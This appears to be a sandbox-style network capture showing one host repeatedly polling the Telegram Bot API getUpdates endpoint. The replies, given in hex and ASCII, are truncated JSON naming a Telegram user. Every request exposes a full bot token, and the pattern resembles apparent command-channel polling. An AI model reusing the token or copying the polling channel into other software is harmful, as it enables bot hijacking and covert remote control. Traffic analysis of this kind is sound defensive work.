{"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.4	49823	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:54 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:54 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:54 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:54 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.4	49824	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:55 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:55 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:55 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:55 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.4	49825	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:56 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:56 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:56 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:56 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.4	49826	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:57 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:57 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:57 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:57 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.4	49827	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:58 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:58 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:58 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:58 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.4	49828	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:59 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:59 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:59 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:59 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.4	49829	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:58:00 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:58:01 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:58:01 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:58:01 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.4	49830	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:58:01 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:58:01 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:58:01 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:58:01 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.4	49831	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:58:03 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:58:03 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:58:03 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:58:03 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.4	49832	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:58:03 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:58:03 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:58:03 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:58:03 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.4	49833	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:58:05 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:58:05 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:58:05 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:58:05 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.4	49834	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:58:05 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:58:06 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:58:05 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:58:06 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.4	49835	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:58:07 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:58:07 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:58:07 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:58:07 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.4	49836	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:58:07 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:58:08 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:58:07 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
